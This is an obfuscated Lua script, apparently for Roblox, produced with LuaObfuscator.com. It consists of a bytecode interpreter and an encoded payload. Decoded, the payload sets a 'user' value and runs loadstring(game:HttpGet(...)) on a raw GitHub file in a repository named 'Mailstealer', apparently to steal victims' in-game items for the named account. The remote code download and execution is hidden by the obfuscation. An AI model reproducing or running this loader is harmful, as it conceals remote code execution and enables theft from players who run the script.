--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v98=v5(v86,v19);v19=nil;return v98;else return v86;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v87=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-((1 -0) -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v87-(v87%(932 -(857 + 74))) ;else local v88=568 -(367 + 201) ;local v89;while true do if (v88==((834 + 93) -(214 + 713))) then v89=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v89 + v89))>=v89) and (878 -(282 + 595))) or (1637 -((2588 -(68 + 997)) + (1384 -(226 + 1044)))) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(118 -(32 + 85))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=(2285 -1327) -((1648 -756) + 65) ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==1) then return (v38 * (606 -(87 + 263))) + v37 ;end if (v36==(180 -(67 + 113))) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;v36=(3 -2) + 0 ;end end end local function v23()local v39=952 -(802 + 150) ;local v40;local v41;local v42;local v43;while true do if (v39==(2 -1)) then return (v43 * 16777216) + (v42 * (185570 -120034)) + (v41 * (150 + 106)) + v40 ;end if (v39==(0 -(0 -0))) then v40,v41,v42,v43=v1(v16,v18,v18 + 1 + 2 + 0 );v18=v18 + (6 -2) ;v39=(991 + 7) -(915 + 82) ;end end end local function v24()local v44=791 -(368 + 423) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==((2 -0) + 1)) then if (v49==(0 -0)) then if (v48==(18 -(10 + 8))) then return v50 * (1080 -((3138 -2118) + 60)) ;else v49=1424 -(630 + 793) ;v47=0 -0 ;end elseif (v49==((2251 + 5623) -5827)) then return ((v48==(0 + (0 -0))) and (v50 * ((443 -(416 + 26))/(1747 -(760 + 987))))) or (v50 * NaN) ;end return v8(v50,v49-(3266 -(2257 -(9 + 5))) ) * (v47 + (v48/((1915 -(1789 + 124))^(23 + 29)))) ;end if (v44==(1 -0)) then v47=439 -(145 + 293) ;v48=(v20(v46,431 -(44 + 386) ,(431 -(85 + 291)) -35 ) * ((7 -(1270 -(243 + 1022)))^(1518 -(998 + 488)))) + v45 ;v44=1 + 1 ;end if (((0 -0) + 0)==v44) then v45=v23();v46=v23();v44=773 -(201 + 571) ;end if ((2 + 0)==v44) then v49=v20(v46,1159 -(116 + 1022) ,128 -97 );v50=((v20(v46,19 + 13 )==(3 -2)) and  -(3 -2)) or (860 -(814 + (1225 -(1123 + 57)))) ;v44=7 -(4 + 0) ;end end end local function v25(v51)local v52;if  not v51 then local v90=254 -(163 + 91) ;while true do if ((0 -0)==v90) then v51=v23();if (v51==(1930 -(1869 + 61))) then return "";end break;end end end v52=v3(v16,v18,(v18 + v51) -(1 -0) );v18=v18 + v51 ;local v53={};for v67=1 + 0 , #v52 do v53[v67]=v2(v1(v3(v52,v67,v67)));end return v6(v53);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=1456 -(282 + 1174) ;local v55;local v56;local v57;local v58;local v59;local v60;while true do local v69=0 -0 ;local v70;while true do if (v69==(811 -(569 + 242))) then v70=0 -0 ;while true do if (v70~=(0 + 0)) then else if (v54==(1 + 0)) then v59=v23();v60={};for v107=1,v59 do local v108=1024 -(706 + 318) ;local v109;local v110;local v111;while true do if (v108==(1 + 0)) then v111=nil;while true do if (v109~=0) then else local v175=1251 -(721 + 530) ;while true do if (0==v175) then v110=v21();v111=nil;v175=1;end if (v175~=(1272 -(945 + 326))) then else v109=2 -1 ;break;end end end if (v109~=(1 + 0)) then else if (v110==(701 -(271 + 429))) then v111=v21()~=0 ;elseif (v110==(4 -2)) then v111=v24();elseif (v110~=(3 + 0)) then else v111=v25();end v60[v107]=v111;break;end end break;end if (v108==0) then v109=0;v110=nil;v108=1501 -(1408 + 92) ;end end end v58[3]=v21();v54=1088 -(461 + 625) ;end if (v54~=(1288 -(993 + 295))) then else v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1;end v70=1 + 0 ;end if (v70~=(1 + 0)) then else if (v54~=(755 -(239 + 514))) then else local v103=0 + 0 ;local v104;while true do if ((1329 -(797 + 532))~=v103) then else v104=0 + 0 ;while true do local v137=0 + 0 ;while true do if (v137~=(0 -0)) then else if ((530 -(406 + 123))==v104) then return v58;end if (v104==(1202 -(373 + 829))) then local v177=1769 -(1749 + 20) ;while true do if (v177~=(1 + 0)) then else v104=1323 -(1249 + 73) ;break;end if (v177~=(0 + 0)) then else for v178=1,v23() do local v179=0;local v180;while true do if (v179~=(1145 -(466 + 679))) then else v180=v21();if (v20(v180,1,2 -1 )==(238 -(64 + 174))) then local v183=0;local v184;local v185;local v186;local v187;while true do if ((5 -3)==v183) then while true do if (v184==(1901 -(106 + 1794))) then local v192=0 + 0 ;local v193;while true do if (v192==0) then v193=0 + 0 ;while true do if (v193==(1 -0)) then v184=338 -(144 + 192) ;break;end if (v193==0) then local v203=0 -0 ;local v204;while true do if (v203==(216 -(42 + 174))) then v204=0 -0 ;while true do if (v204==(114 -(4 + 110))) then local v208=0 + 0 ;while true do if (v208~=1) then else v204=585 -(57 + 527) ;break;end if (v208~=(1427 -(41 + 1386))) then else v187={v22(),v22(),nil,nil};if (v185==0) then local v213=0 + 0 ;local v214;while true do if (0~=v213) then else v214=1580 -(1183 + 397) ;while true do if ((0 -0)==v214) then v187[3]=v22();v187[3 + 1 ]=v22();break;end end break;end end elseif (v185==(1 + 0)) then v187[6 -3 ]=v23();elseif (v185==(5 -3)) then v187[3]=v23() -(2^16) ;elseif (v185~=(169 -(122 + 44))) then else local v219=0 -0 ;local v220;while true do if ((0 + 0)~=v219) then else v220=0;while true do if (v220==0) then v187[9 -6 ]=v23() -((2 + 0)^(1949 -(565 + 1368))) ;v187[15 -11 ]=v22();break;end end break;end end end v208=1662 -(1477 + 184) ;end end end if (v204~=(1 + 0)) then else v193=1 -0 ;break;end end break;end end end end break;end end end if (v184==(67 -(30 + 35))) then local v194=0;local v195;local v196;while true do if ((1 + 0)~=v194) then else while true do if (v195~=0) then else v196=0;while true do if (v196==(1258 -(1043 + 214))) then v184=11 -8 ;break;end if (v196==(1212 -(323 + 889))) then local v206=0 -0 ;while true do if (v206~=(580 -(361 + 219))) then else if (v20(v186,1,321 -(53 + 267) )==1) then v187[1 + 1 ]=v60[v187[2 + 0 ]];end if (v20(v186,415 -(15 + 398) ,2)==1) then v187[479 -(41 + 435) ]=v60[v187[985 -(18 + 964) ]];end v206=1;end if (v206==(3 -2)) then v196=1;break;end end end end break;end end break;end if (v194~=(0 + 0)) then else v195=0;v196=nil;v194=1;end end end if ((2 + 1)==v184) then if (v20(v186,3,853 -(20 + 830) )~=(1 + 0)) then else v187[4]=v60[v187[1129 -(936 + 189) ]];end v55[v178]=v187;break;end if (v184~=(126 -(116 + 10))) then else local v198=0 + 0 ;local v199;while true do if (v198~=(738 -(542 + 196))) then else v199=0;while true do if (v199==1) then v184=1614 -(1565 + 48) ;break;end if (v199==(0 + 0)) then local v205=0;while true do if ((1138 -(782 + 356))==v205) then local v207=267 -(176 + 91) ;while true do if (v207~=(2 -1)) then else v205=1 -0 ;break;end if (v207==(0 -0)) then v185=v20(v180,1094 -(975 + 117) ,1 + 2 );v186=v20(v180,4 + 0 ,6);v207=1 + 0 ;end end end if ((1 + 0)~=v205) then else v199=2 -1 ;break;end end end end break;end end end end break;end if ((2 -1)==v183) then local v188=0;local v189;while true do if (v188~=(1018 -(697 + 321))) then else v189=1551 -(1126 + 425) ;while true do if (v189~=(406 -(118 + 287))) then else v183=7 -5 ;break;end if (v189==(1121 -(118 + 1003))) then local v202=0;while true do if (v202~=(1 + 0)) then else v189=2 -1 ;break;end if (v202~=0) then else v186=nil;v187=nil;v202=378 -(142 + 235) ;end end end end break;end end end if (v183~=(0 -0)) then else local v190=1227 -(322 + 905) ;local v191;while true do if (v190~=0) then else v191=0;while true do if (v191==(611 -(602 + 9))) then v184=0;v185=nil;v191=1;end if (v191~=1) then else v183=1;break;end end break;end end end end end break;end end end for v181=1 + 0 ,v23() do v56[v181-(873 -(826 + 46)) ]=v28();end v177=1;end end end break;end end end break;end end end break;end end break;end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v71=v64;local v72=v65;local v73=v66;local v74=v27;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v91=0,v79 do if (v91>=v73) then v77[v91-v73 ]=v78[v91 + 1 ];else v81[v91]=v78[v91 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=5) then if (v84<=2) then if (v84<=0) then v81[v83[2]]=v83[3]~=0 ;elseif (v84==1) then local v112=v83[2];local v113,v114=v74(v81[v112](v13(v81,v112 + 1 ,v83[3])));v76=(v114 + v112) -1 ;local v115=0;for v130=v112,v76 do v115=v115 + 1 ;v81[v130]=v113[v115];end else v75=v83[3];end elseif (v84<=3) then v81[v83[2]]=v83[3];elseif (v84==4) then local v117=0;local v118;local v119;while true do if (v117==0) then v118=v83[2];v119=v81[v83[3]];v117=1;end if (v117==1) then v81[v118 + 1 ]=v119;v81[v118]=v119[v83[4]];break;end end else local v120=0;local v121;local v122;local v123;local v124;local v125;while true do if (v120==0) then v121=nil;v122,v123=nil;v124=nil;v125=nil;v120=1;end if (v120==7) then v121=0;for v166=v125,v76 do v121=v121 + 1 ;v81[v166]=v122[v121];end v75=v75 + 1 ;v83=v71[v75];v120=8;end if (v120==9) then v81[v83[2]]();v75=v75 + 1 ;v83=v71[v75];v75=v83[3];break;end if (v120==1) then v63[v83[3]]=v81[v83[2]];v75=v75 + 1 ;v83=v71[v75];if ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v63;else v81[v83[2]]=v63[v83[3]];end v120=2;end if (v120==4) then v81[v125]=v124[v83[4]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v120=5;end if (v120==5) then v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3]~=0 ;v75=v75 + 1 ;v120=6;end if (v120==8) then v125=v83[2];v81[v125]=v81[v125](v13(v81,v125 + 1 ,v76));v75=v75 + 1 ;v83=v71[v75];v120=9;end if (v120==6) then v83=v71[v75];v125=v83[2];v122,v123=v74(v81[v125](v13(v81,v125 + 1 ,v83[3])));v76=(v123 + v125) -1 ;v120=7;end if (v120==2) then v75=v75 + 1 ;v83=v71[v75];if ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v63;else v81[v83[2]]=v63[v83[3]];end v75=v75 + 1 ;v120=3;end if (v120==3) then v83=v71[v75];v125=v83[2];v124=v81[v83[3]];v81[v125 + 1 ]=v124;v120=4;end end end elseif (v84<=8) then if (v84<=6) then for v105=v83[2],v83[3] do v81[v105]=nil;end elseif (v84>7) then local v126=v83[2];v81[v126]=v81[v126](v13(v81,v126 + 1 ,v76));else v81[v83[2]]();end elseif (v84<=10) then if (v84==9) then v63[v83[3]]=v81[v83[2]];else do return;end end elseif (v84>11) then if ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v63;else v81[v83[2]]=v63[v83[3]];end elseif (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end v75=v75 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003043O0075736572030A3O003178317831783179696B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400163O0012033O00014O0006000100013O00260B3O0002000100010004023O00020001001203000100013O00260B00010005000100010004023O00050001001203000200033O001205000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000600016O000300066O00023O00024O00020001000100044O001500010004023O000500010004023O001500010004023O000200012O000A3O00017O00",v9(),...);